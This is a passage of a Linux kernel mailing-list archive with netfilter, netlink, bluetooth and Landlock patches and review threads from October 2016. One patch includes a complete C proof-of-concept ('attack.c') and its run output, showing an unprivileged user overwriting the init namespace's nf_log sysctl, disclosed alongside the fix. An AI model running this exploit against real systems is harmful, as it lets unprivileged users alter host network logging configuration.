  nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
  Call Trace:
  [] nft_do_chain+0xfb/0x4e0 [nf_tables]
  [] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
  [] ? ipt_do_table+0x327/0x610
  [] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
  [] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
  [] nf_iterate+0x62/0x80
  [] nf_hook_slow+0x73/0xd0
  [] __ip_local_out+0xcd/0xe0
  [] ? ip_forward_options+0x1b0/0x1b0
  [] ip_local_out+0x1c/0x40

This is because divisor is 64-bit, but we treat it as a 32-bit integer,
then 0xf becomes zero, i.e. divisor becomes 0.

Signed-off-by: Liping Zhang 
Signed-off-by: Pablo Neira Ayuso 
---
 net/netfilter/nft_limit.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c
index 070b98938e02..c6baf412236d 100644
--- a/net/netfilter/nft_limit.c
+++ b/net/netfilter/nft_limit.c
@@ -145,7 +145,7 @@ static int nft_limit_pkts_init(const struct nft_ctx *ctx,
if (err < 0)
return err;
 
-   priv->cost = div_u64(priv->limit.nsecs, priv->limit.rate);
+   priv->cost = div64_u64(priv->limit.nsecs, priv->limit.rate);
return 0;
 }
 
@@ -170,7 +170,7 @@ static void nft_limit_pkt_bytes_eval(const struct nft_expr 
*expr,
 const struct nft_pktinfo *pkt)
 {
struct nft_limit *priv = nft_expr_priv(expr);
-   u64 cost = div_u64(priv->nsecs * pkt->skb->len, priv->rate);
+   u64 cost = div64_u64(priv->nsecs * pkt->skb->len, priv->rate);
 
if (nft_limit_eval(priv, cost))
regs->verdict.code = NFT_BREAK;
-- 
2.1.4



[PATCH 4/5] netfilter: fix namespace handling in nf_log_proc_dostring

2016-10-05 Thread Pablo Neira Ayuso
From: Jann Horn 

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char child_stack[100];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}

int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
  NULL))
err(1, "mount");

/* Yes, we need to set the maps for the net sysctls to recognize us
 * as namespace root.
 */
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);

stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}

int main(void) {
outer_uid = getuid();
outer_gid = getgid();

int child = clone(child_fn, child_stack + sizeof(child_stack),
  CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
  |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");

char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn 
Signed-off-by: Pablo Neira Ayuso 
---
 net/netfilter/nf_log.c | 6 --
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index 30a17d649a83..3dca90dc24ad 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -422,7 +422,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, 
int write,
char buf[NFLOGGER_NAME_LEN];
int r = 0;
int tindex = (unsigned long)table->extra1;
-   struct net *net = current->nsproxy->net_ns;
+   struct net *net = table->extra2;
 
if (write) {
struct ctl_table tmp = *table;
@@ -476,7 +476,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
-   nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
nf_log_sysctl_table[i].mode = 0644;
nf_log_sysctl_table[i].proc_handler =
@@ -486,6 +485,9 @@ static int netfilter_log_sysctl_init(struct net *net)
}
}
 
+   for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+   table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
-- 
2.1.4



[PATCH 1/5] netfilter: Fix potential null pointer dereference

2016-10-05 Thread Pablo Neira Ayuso
From: Aaron Conole 

It's possible for nf_hook_entry_head to return NULL.  If two
nf_unregister_net_hook calls happen simultaneously with a single hook
entry in the list, both will enter the nf_hook_mutex critical section.
The first will successfully delete the head, but the second will see
this NULL pointer and attempt to dereference.

This fix ensures that no null pointer dereference could occur when such
a condition happens.

Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole 
Signed-off-by: Pablo Neira Ayuso 
---
 net/netfilter/core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/netfilter/core.c b/net/netfilter/core.c
index fa6715db4581..e3f68a786afe 100644
--- a/net/netfilter/core.c
+++ b/net/netfilter/core.c
@@ -160,7 +160,7 @@ void nf_unregister_net_hook(struct net *net, const struct 
nf_hook_ops *reg)
 
mutex_lock(&nf_hook_mutex);
hooks_entry = nf_hook_entry_head(net, reg);
-   if (hooks_entry->orig_ops == reg) {
+   if (hooks_entry && hooks_entry->orig_ops == reg) {
nf_set_hooks_head(net, reg,
  nf_entry_dereference(hooks_entry->next));
goto unlock;
-- 
2.1.4



Re: [PATCH net] netlink: do not enter direct reclaim from netlink_dump()

2016-10-05 Thread Alexei Starovoitov
On Thu, Oct 06, 2016 at 08:30:11AM +0900, Eric Dumazet wrote:
> On Wed, 2016-10-05 at 15:24 -0700, Alexei Starovoitov wrote:
> > On Thu, Oct 06, 2016 at 04:13:18AM +0900, Eric Dumazet wrote:
> > > 
> > > While we are at it, since we do an order-3 allocation, allow to use
> > > all the allocated bytes instead of 16384 to reduce syscalls during
> > > large dumps.
> > > 
> > > iproute2 already uses 32KB recvmsg() buffer sizes.
> > 
> > > diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
> > > index 
> > > 627f898c05b96552318a881ce995ccc3342e1576..62bea4591054820eb516ef016214ee23fe89b6e9
> > >  100644
> > > --- a/net/netlink/af_netlink.c
> > > +++ b/net/netlink/af_netlink.c
> > > @@ -1832,7 +1832,7 @@ static int netlink_recvmsg(struct socket *sock, 
> > > struct msghdr *msg, size_t len,
> > >   /* Record the max length of recvmsg() calls for future allocations */
> > >   nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
> > >   nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
> > > -  16384);
> > > +  SKB_WITH_OVERHEAD(32768));
> > 
> > sure, it won't stress it more than what it is today, but why increase it?
> > iproute2 increased the buffer form 16k to 32k due to 'msg_trunc' which
> > I think was due to this issue. If we go with SKB_WITH_OVERHEAD(16384)
> > we can go back to 16k in iproute2 as well.
> > 
> > Do we have any data to justify that buffer of 32k - skb_shared_info vs 16k
> > will meaninfully reduce the number of syscalls?
> > We're seeing direct reclaim get hammered due to order-3.
> > Not sure whether & ~__GFP_DIRECT_RECLAIM is going to be enough.
> 
> It is. Really.
> 
> > Currently we're testing with SKB_WITH_OVERHEAD(16384) and 
> > ~__GFP_DIRECT_RECLAIM.
> > It will take another week to make sure SKB_WITH_OVERHEAD(32768) is ok.
> > imo this optimization is done too soon.
> > I'd much more comfortable with SKB_WITH_OVERHEAD(16384) value here.
> 
> Well, we _are_ allocating order-3 pages already.
> 
> No need to switch to order-2 pages, when we have the proper fix.
> 
> Note that tcp_sendmsg() does this all the time, and nobody complained
> after Shaohua Li fix (commit fb05e7a89f500cf "net: don't wait for
> order-3 page allocation")
> 
> Why thousands of sockets could use order-3 pages, but constrain _one_
> (rtnl serializations) iproute2 dump to use tiny blocs exactly ?

Good point. Large tcp_sendmsg() should be stressing mm
with order-3 more than netlink polling once a second
that some application do with 'ss' or 'tc -s show'

> Really there is no point being cautious here.

I guess I'm being too paranoid. If we discover issues
with SKB_WITH_OVERHEAD(32768), we can adjust it later, so
Acked-by: Alexei Starovoitov 



Re: [PATCH net] netlink: do not enter direct reclaim from netlink_dump()

2016-10-05 Thread Alexei Starovoitov
On Thu, Oct 06, 2016 at 08:35:21AM +0900, Eric Dumazet wrote:
> On Wed, 2016-10-05 at 15:24 -0700, Alexei Starovoitov wrote:
> > On Thu, Oct 06, 2016 at 04:13:18AM +0900, Eric Dumazet wrote:
> > > 
> > > While we are at it, since we do an order-3 allocation, allow to use
> > > all the allocated bytes instead of 16384 to reduce syscalls during
> > > large dumps.
> > > 
> > > iproute2 already uses 32KB recvmsg() buffer sizes.
> > 
> > > diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
> > > index 
> > > 627f898c05b96552318a881ce995ccc3342e1576..62bea4591054820eb516ef016214ee23fe89b6e9
> > >  100644
> > > --- a/net/netlink/af_netlink.c
> > > +++ b/net/netlink/af_netlink.c
> > > @@ -1832,7 +1832,7 @@ static int netlink_recvmsg(struct socket *sock, 
> > > struct msghdr *msg, size_t len,
> > >   /* Record the max length of recvmsg() calls for future allocations */
> > >   nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
> > >   nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
> > > -  16384);
> > > +  SKB_WITH_OVERHEAD(32768));
> > 
> > sure, it won't stress it more than what it is today, but why increase it?
> > iproute2 increased the buffer form 16k to 32k due to 'msg_trunc' which
> > I think was due to this issue. If we go with SKB_WITH_OVERHEAD(16384)
> > we can go back to 16k in iproute2 as well.
> 
> Wow, if really iproute2 tool would have increased the buffer to work
> around a bug in the kernel, we should be worried.
> 
> Hopefully the issue was fixed for good in the kernel ?
> 
> commit db65a3aaf29ecce2e34271d52e8d2336b97bd9fe
> ("netlink: Trim skb to alloc size to avoid MSG_TRUNC")

I would think so too, but
iproute2 'fix' 72b365e8e0fd ("libnetlink: Double the dump buffer size")
was on Mar 4, 2016
whereas above 'netlink: trim' fix is on Oct 15, 2015



Re: [PATCH net] netlink: do not enter direct reclaim from netlink_dump()

2016-10-05 Thread Eric Dumazet
On Wed, 2016-10-05 at 15:24 -0700, Alexei Starovoitov wrote:
> On Thu, Oct 06, 2016 at 04:13:18AM +0900, Eric Dumazet wrote:
> > 
> > While we are at it, since we do an order-3 allocation, allow to use
> > all the allocated bytes instead of 16384 to reduce syscalls during
> > large dumps.
> > 
> > iproute2 already uses 32KB recvmsg() buffer sizes.
> 
> > diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
> > index 
> > 627f898c05b96552318a881ce995ccc3342e1576..62bea4591054820eb516ef016214ee23fe89b6e9
> >  100644
> > --- a/net/netlink/af_netlink.c
> > +++ b/net/netlink/af_netlink.c
> > @@ -1832,7 +1832,7 @@ static int netlink_recvmsg(struct socket *sock, 
> > struct msghdr *msg, size_t len,
> > /* Record the max length of recvmsg() calls for future allocations */
> > nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
> > nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
> > -16384);
> > +SKB_WITH_OVERHEAD(32768));
> 
> sure, it won't stress it more than what it is today, but why increase it?
> iproute2 increased the buffer form 16k to 32k due to 'msg_trunc' which
> I think was due to this issue. If we go with SKB_WITH_OVERHEAD(16384)
> we can go back to 16k in iproute2 as well.

Wow, if really iproute2 tool would have increased the buffer to work
around a bug in the kernel, we should be worried.

Hopefully the issue was fixed for good in the kernel ?

commit db65a3aaf29ecce2e34271d52e8d2336b97bd9fe
("netlink: Trim skb to alloc size to avoid MSG_TRUNC")





Re: [PATCH net] netlink: do not enter direct reclaim from netlink_dump()

2016-10-05 Thread Eric Dumazet
On Wed, 2016-10-05 at 15:24 -0700, Alexei Starovoitov wrote:
> On Thu, Oct 06, 2016 at 04:13:18AM +0900, Eric Dumazet wrote:
> > 
> > While we are at it, since we do an order-3 allocation, allow to use
> > all the allocated bytes instead of 16384 to reduce syscalls during
> > large dumps.
> > 
> > iproute2 already uses 32KB recvmsg() buffer sizes.
> 
> > diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
> > index 
> > 627f898c05b96552318a881ce995ccc3342e1576..62bea4591054820eb516ef016214ee23fe89b6e9
> >  100644
> > --- a/net/netlink/af_netlink.c
> > +++ b/net/netlink/af_netlink.c
> > @@ -1832,7 +1832,7 @@ static int netlink_recvmsg(struct socket *sock, 
> > struct msghdr *msg, size_t len,
> > /* Record the max length of recvmsg() calls for future allocations */
> > nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
> > nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
> > -16384);
> > +SKB_WITH_OVERHEAD(32768));
> 
> sure, it won't stress it more than what it is today, but why increase it?
> iproute2 increased the buffer form 16k to 32k due to 'msg_trunc' which
> I think was due to this issue. If we go with SKB_WITH_OVERHEAD(16384)
> we can go back to 16k in iproute2 as well.
> 
> Do we have any data to justify that buffer of 32k - skb_shared_info vs 16k
> will meaninfully reduce the number of syscalls?
> We're seeing direct reclaim get hammered due to order-3.
> Not sure whether & ~__GFP_DIRECT_RECLAIM is going to be enough.

It is. Really.

> Currently we're testing with SKB_WITH_OVERHEAD(16384) and 
> ~__GFP_DIRECT_RECLAIM.
> It will take another week to make sure SKB_WITH_OVERHEAD(32768) is ok.
> imo this optimization is done too soon.
> I'd much more comfortable with SKB_WITH_OVERHEAD(16384) value here.

Well, we _are_ allocating order-3 pages already.

No need to switch to order-2 pages, when we have the proper fix.

Note that tcp_sendmsg() does this all the time, and nobody complained
after Shaohua Li fix (commit fb05e7a89f500cf "net: don't wait for
order-3 page allocation")

Why thousands of sockets could use order-3 pages, but constrain _one_
(rtnl serializations) iproute2 dump to use tiny blocs exactly ?

The rationale for order-3 is pretty clear : 

#define PAGE_ALLOC_COSTLY_ORDER 3

Really there is no point being cautious here.




Re: [GIT] Networking

2016-10-05 Thread Linus Torvalds
On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell  wrote:
>
> I have been carrying the following merge fix patch (for the merge of
> the net-next tree with Linus' tree) for a while now which seems to have
> got missed:

Ugh. It doesn't seem to be a merge error, because that double iph
assignment came from the original patch that introduced this function:
commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4,
ipv6}_validate()").

So I wouldn't call it a merge error - it just looks like a bug in the
network layer. So I'm not going to apply your patch even though it
looks plausible to me, simply because it's outside my area of
expertise.

David? Pablo?

   Linus


Re: [GIT] Networking

2016-10-05 Thread Stephen Rothwell
Hi Linus, Dave,

On Wed, 05 Oct 2016 01:44:37 -0400 (EDT) David Miller  
wrote:
>

I have been carrying the following merge fix patch (for the merge of
the net-next tree with Linus' tree) for a while now which seems to have
got missed:

From: Stephen Rothwell 
Date: Tue, 13 Sep 2016 10:08:58 +1000
Subject: [PATCH] netfilter: merge fixup for "nf_tables_netdev: remove redundant 
ip_hdr assignment"

Signed-off-by: Stephen Rothwell 
---
 include/net/netfilter/nf_tables_ipv4.h | 1 -
 1 file changed, 1 deletion(-)

diff --git a/include/net/netfilter/nf_tables_ipv4.h 
b/include/net/netfilter/nf_tables_ipv4.h
index 968f00b82fb5..25e33aee91e7 100644
--- a/include/net/netfilter/nf_tables_ipv4.h
+++ b/include/net/netfilter/nf_tables_ipv4.h
@@ -33,7 +33,6 @@ __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt,
if (!iph)
return -1;
 
-   iph = ip_hdr(skb);
if (iph->ihl < 5 || iph->version != 4)
return -1;
 
-- 
2.8.1

-- 
Cheers,
Stephen Rothwell


Re: [PATCH] bluetooth.h: __ variants of u8 and friends are not neccessary inside kernel

2016-10-05 Thread Joe Perches
On Thu, 2016-10-06 at 00:13 +0200, Pavel Machek wrote:
> On Wed 2016-10-05 12:15:34, Joe Perches wrote:
> > On Wed, 2016-10-05 at 21:11 +0200, Pavel Machek wrote:
> > > On Wed 2016-10-05 10:53:16, Joe Perches wrote:
[]
> > > > trivia:
> > > > It's generally faster to use bool instead of u8 foo:1;
> > > Ok, but I'm not changing that in this patch.
> > > (And actually, bool will take a lot more memory, right?)
> > No worries, and bool is the same size as u8.
> Exactly what I'm talking about :-). One byte vs. one bit, right?

Memory isn't bit addressable.
So it's the same byte, it just doesn't use a read/modify/write
operation to update a value.



Re: [PATCH net] netlink: do not enter direct reclaim from netlink_dump()

2016-10-05 Thread Alexei Starovoitov
On Thu, Oct 06, 2016 at 04:13:18AM +0900, Eric Dumazet wrote:
> 
> While we are at it, since we do an order-3 allocation, allow to use
> all the allocated bytes instead of 16384 to reduce syscalls during
> large dumps.
> 
> iproute2 already uses 32KB recvmsg() buffer sizes.

> diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
> index 
> 627f898c05b96552318a881ce995ccc3342e1576..62bea4591054820eb516ef016214ee23fe89b6e9
>  100644
> --- a/net/netlink/af_netlink.c
> +++ b/net/netlink/af_netlink.c
> @@ -1832,7 +1832,7 @@ static int netlink_recvmsg(struct socket *sock, struct 
> msghdr *msg, size_t len,
>   /* Record the max length of recvmsg() calls for future allocations */
>   nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
>   nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
> -  16384);
> +  SKB_WITH_OVERHEAD(32768));

sure, it won't stress it more than what it is today, but why increase it?
iproute2 increased the buffer form 16k to 32k due to 'msg_trunc' which
I think was due to this issue. If we go with SKB_WITH_OVERHEAD(16384)
we can go back to 16k in iproute2 as well.

Do we have any data to justify that buffer of 32k - skb_shared_info vs 16k
will meaninfully reduce the number of syscalls?
We're seeing direct reclaim get hammered due to order-3.
Not sure whether & ~__GFP_DIRECT_RECLAIM is going to be enough.
Currently we're testing with SKB_WITH_OVERHEAD(16384) and ~__GFP_DIRECT_RECLAIM.
It will take another week to make sure SKB_WITH_OVERHEAD(32768) is ok.
imo this optimization is done too soon.
I'd much more comfortable with SKB_WITH_OVERHEAD(16384) value here.

>  
>   copied = data_skb->len;
>   if (len < copied) {
> @@ -2083,8 +2083,9 @@ static int netlink_dump(struct sock *sk)
>  
>   if (alloc_min_size < nlk->max_recvmsg_len) {
>   alloc_size = nlk->max_recvmsg_len;
> - skb = alloc_skb(alloc_size, GFP_KERNEL |
> - __GFP_NOWARN | __GFP_NORETRY);
> + skb = alloc_skb(alloc_size,
> + (GFP_KERNEL & ~__GFP_DIRECT_RECLAIM) |
> + __GFP_NOWARN | __GFP_NORETRY);
>   }
>   if (!skb) {
>   alloc_size = alloc_min_size;
> 
> 


Re: [RFC v3 03/22] bpf,landlock: Add a new arraymap type to deal with (Landlock) handles

2016-10-05 Thread Mickaël Salaün

On 04/10/2016 01:53, Kees Cook wrote:
> On Wed, Sep 14, 2016 at 12:23 AM, Mickaël Salaün  wrote:
>> This new arraymap looks like a set and brings new properties:
>> * strong typing of entries: the eBPF functions get the array type of
>>   elements instead of CONST_PTR_TO_MAP (e.g.
>>   CONST_PTR_TO_LANDLOCK_HANDLE_FS);
>> * force sequential filling (i.e. replace or append-only update), which
>>   allow quick browsing of all entries.
>>
>> This strong typing is useful to statically check if the content of a map
>> can be passed to an eBPF function. For example, Landlock use it to store
>> and manage kernel objects (e.g. struct file) instead of dealing with
>> userland raw data. This improve efficiency and ensure that an eBPF
>> program can only call functions with the right high-level arguments.
>>
>> The enum bpf_map_handle_type list low-level types (e.g.
>> BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD) which are identified when
>> updating a map entry (handle). This handle types are used to infer a
>> high-level arraymap type which are listed in enum bpf_map_array_type
>> (e.g. BPF_MAP_ARRAY_TYPE_LANDLOCK_FS).
>>
>> For now, this new arraymap is only used by Landlock LSM (cf. next
>> commits) but it could be useful for other needs.
>>
>> Changes since v2:
>> * add a RLIMIT_NOFILE-based limit to the maximum number of arraymap
>>   handle entries (suggested by Andy Lutomirski)
>> * remove useless checks
>>
>> Changes since v1:
>> * arraymap of handles replace custom checker groups
>> * simpler userland API
>>
>> Signed-off-by: Mickaël Salaün 
>> Cc: Alexei Starovoitov 
>> Cc: Andy Lutomirski 
>> Cc: Daniel Borkmann 
>> Cc: David S. Miller 
>> Cc: Kees Cook 
>> Link: 
>> https://lkml.kernel.org/r/calcetrwwtiz3kztkegow24-dvhqq6lftwexh77fd2g5o71y...@mail.gmail.com
>> ---
>>  include/linux/bpf.h  |  14 
>>  include/uapi/linux/bpf.h |  18 +
>>  kernel/bpf/arraymap.c| 203 
>> +++
>>  kernel/bpf/verifier.c|  12 ++-
>>  4 files changed, 246 insertions(+), 1 deletion(-)
>>
>> [...]
>> diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
>> index a2ac051c342f..94256597eacd 100644
>> --- a/kernel/bpf/arraymap.c
>> +++ b/kernel/bpf/arraymap.c
>> [...]
>> +   /*
>> +* Limit number of entries in an arraymap of handles to the maximum
>> +* number of open files for the current process. The maximum number 
>> of
>> +* handle entries (including all arraymaps) for a process is then
>> +* (RLIMIT_NOFILE - 1) * RLIMIT_NOFILE. If the process' RLIMIT_NOFILE
>> +* is 0, then any entry update is forbidden.
>> +*
>> +* An eBPF program can inherit all the arraymap FD. The worse case is
>> +* to fill a bunch of arraymaps, create an eBPF program, close the
>> +* arraymap FDs, and start again. The maximum number of arraymap
>> +* entries can then be close to RLIMIT_NOFILE^3.
>> +*
>> +* FIXME: This should be improved... any idea?
>> +*/
>> +   if (unlikely(index >= rlimit(RLIMIT_NOFILE)))
>> +   return -EMFILE;
> 
> I'm not sure what's best for resource management here. Landlock will
> be holding open path structs, for example, but how are you expecting
> to track things like network policies? An allowed IP address, for
> example, doesn't have a handle outside of doing a full
> socket()/connect() setup.

Path and file references are hard to handle correctly but other things
should be simpler. External resources (i.e. not relative to the running
system as paths are) like network hosts or ports could simply be
expressed as raw values (like used for iptables rules). Moreover, for
network rules, relying on raw packet values (as
BPF_PROG_TYPE_SOCKET_FILTER have access to) may be more than enough.

> 
> I think an explicit design for resource management should be
> considered up front...

I'm not really sure how to handle that part…

There is basically two ways to express a "kernel object": relative (with
an internal pointer to a struct, e.g. struct file) or absolute (a raw
value). Both of them use kernel memory. However, only the former may
impact other parts of the kernel (e.g. can force to hold a kernel object
like a struct dentry). The impact of this is not clear for me but it
looks like other resource managements for a process: number of open
files, number of network connections…

The more reasonable approach seems to charge the user for the (kernel)
memory dedicated to the user's policy. How can I do it? Maybe to
decrement the RLIMIT_NPROC and check the RLIMIT_AS (i.e. act like a
virtual process)?

There is no such limits with other eBPF maps (even those dealing with
FD), so this may be too much.

 Mickaël



signature.asc
Description: OpenPGP digital signature


Re: [PATCH] bluetooth.h: __ variants of u8 and friends are not neccessary inside kernel

2016-10-05 Thread Pavel Machek
On Wed 2016-10-05 12:15:34, Joe Perches wrote:
> On Wed, 2016-10-05 at 21:11 +0200, Pavel Machek wrote:
> > On Wed 2016-10-05 10:53:16, Joe Perches wrote:
> > > On Wed, 2016-10-05 at 13:14 +0200, Marcel Holtmann wrote:
> > > > Hi Pavel,
> > > > 
> > > > > bluetooth.h is not part of user API, so __ variants are not neccessary
> > > > > here.
> > > > > 
> > > > > Signed-off-by: Pavel Machek 
> > > > > 
> > > > > diff --git a/include/net/bluetooth/bluetooth.h 
> > > > > b/include/net/bluetooth/bluetooth.h
> > > 
> > > []
> > > > > struct bt_skb_cb {
> > > > > - __u8 pkt_type;
> > > > > - __u8 force_active;
> > > > > - __u16 expect;
> > > > > - __u8 incoming:1;
> > > > > + u8 pkt_type;
> > > > > + u8 force_active;
> > > > > + u16 expect;
> > > > > + u8 incoming:1;
> > > > >   union {
> > > > >   struct l2cap_ctrl l2cap;
> > > > >   struct hci_ctrl hci;
> > > 
> > > 
> > > trivia:
> > > 
> > > It's generally faster to use bool instead of u8 foo:1;
> > 
> > Ok, but I'm not changing that in this patch.
> > (And actually, bool will take a lot more memory, right?)
> 
> No worries, and bool is the same size as u8.

Exactly what I'm talking about :-). One byte vs. one bit, right?

Pavel

-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) 
http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html


signature.asc
Description: Digital signature


Re: [PATCHv2] bluetooth.h: __ variants of u8 and friends are not neccessary inside kernel

2016-10-05 Thread Marcel Holtmann
Hi Pavel,

> bluetooth.h is not part of user API, so __ variants are not neccessary
> here.
> 
> Signed-off-by: Pavel Machek 
> 
> ---
> v2: not touching stuff that Marcel does not want touched, as it will
> become API later.

patch has been applied to bluetooth-next tree.

Regards

Marcel



Re: [RFC v3 16/22] bpf/cgroup,landlock: Handle Landlock hooks per cgroup

2016-10-05 Thread Kees Cook
On Wed, Oct 5, 2016 at 1:58 PM, Mickaël Salaün  wrote:
>
>
> On 04/10/2016 01:43, Kees Cook wrote:
>> On Wed, Sep 14, 2016 at 12:24 AM, Mickaël Salaün  wrote:
>>> This allows to add new eBPF programs to Landlock hooks dedicated to a
>>> cgroup thanks to the BPF_PROG_ATTACH command. Like for socket eBPF
>>> programs, the Landlock hooks attached to a cgroup are propagated to the
>>> nested cgroups. However, when a new Landlock program is attached to one
>>> of this nested cgroup, this cgroup hierarchy fork the Landlock hooks.
>>> This design is simple and match the current CONFIG_BPF_CGROUP
>>> inheritance. The difference lie in the fact that Landlock programs can
>>> only be stacked but not removed. This match the append-only seccomp
>>> behavior. Userland is free to handle Landlock hooks attached to a cgroup
>>> in more complicated ways (e.g. continuous inheritance), but care should
>>> be taken to properly handle error cases (e.g. memory allocation errors).
>>>
>>> Changes since v2:
>>> * new design based on BPF_PROG_ATTACH (suggested by Alexei Starovoitov)
>>>
>>> Signed-off-by: Mickaël Salaün 
>>> Cc: Alexei Starovoitov 
>>> Cc: Andy Lutomirski 
>>> Cc: Daniel Borkmann 
>>> Cc: Daniel Mack 
>>> Cc: David S. Miller 
>>> Cc: Kees Cook 
>>> Cc: Tejun Heo 
>>> Link: 
>>> https://lkml.kernel.org/r/20160826021432.ga8...@ast-mbp.thefacebook.com
>>> Link: 
>>> https://lkml.kernel.org/r/20160827204307.ga43...@ast-mbp.thefacebook.com
>>> ---
>>>  include/linux/bpf-cgroup.h  |  7 +++
>>>  include/linux/cgroup-defs.h |  2 ++
>>>  include/linux/landlock.h|  9 +
>>>  include/uapi/linux/bpf.h|  1 +
>>>  kernel/bpf/cgroup.c | 33 ++---
>>>  kernel/bpf/syscall.c| 11 +++
>>>  security/landlock/lsm.c | 40 +++-
>>>  security/landlock/manager.c | 32 
>>>  8 files changed, 131 insertions(+), 4 deletions(-)
>>>
>>> [...]
>>> diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
>>> index 7b75fa692617..1c18fe46958a 100644
>>> --- a/kernel/bpf/cgroup.c
>>> +++ b/kernel/bpf/cgroup.c
>>> @@ -15,6 +15,7 @@
>>>  #include 
>>>  #include 
>>>  #include 
>>> +#include 
>>>
>>>  DEFINE_STATIC_KEY_FALSE(cgroup_bpf_enabled_key);
>>>  EXPORT_SYMBOL(cgroup_bpf_enabled_key);
>>> @@ -31,7 +32,15 @@ void cgroup_bpf_put(struct cgroup *cgrp)
>>> union bpf_object pinned = cgrp->bpf.pinned[type];
>>>
>>> if (pinned.prog) {
>>> -   bpf_prog_put(pinned.prog);
>>> +   switch (type) {
>>> +   case BPF_CGROUP_LANDLOCK:
>>> +#ifdef CONFIG_SECURITY_LANDLOCK
>>> +   put_landlock_hooks(pinned.hooks);
>>> +   break;
>>> +#endif /* CONFIG_SECURITY_LANDLOCK */
>>> +   default:
>>> +   bpf_prog_put(pinned.prog);
>>> +   }
>>> static_branch_dec(&cgroup_bpf_enabled_key);
>>> }
>>> }
>>
>> I get creeped out by type-controlled unions of pointers. :P I don't
>> have a suggestion to improve this, but I don't like seeing a pointer
>> type managed separately from the pointer itself as it tends to bypass
>> a lot of both static and dynamic checking. A union is better than a
>> cast of void *, but it still worries me. :)
>
> This is not fully satisfactory for me neither but the other approach is
> to use two distinct struct fields instead of a union.
> Do you prefer if there is a "type" field in the "pinned" struct to
> select the union?

Since memory usage isn't a huge deal for this, I'd actually prefer
there just be no union at all. Have a type field, and a distinct
pointer field for each type you're expecting to use. That way there
can never be confusion between types and you could even validate that
only a single field type has been populated, etc.

-Kees

-- 
Kees Cook
Nexus Security


Re: error: 'struct net_device' has no member named 'nf_hooks_ingress'

2016-10-05 Thread Eric Dumazet
On Wed, 2016-10-05 at 22:56 +0200, Michal Sojka wrote:

> this commit is now in mainline as
> e3b37f11e6e4e6b6f02cc762f182ce233d2c1c9d and it breaks my build:
> 
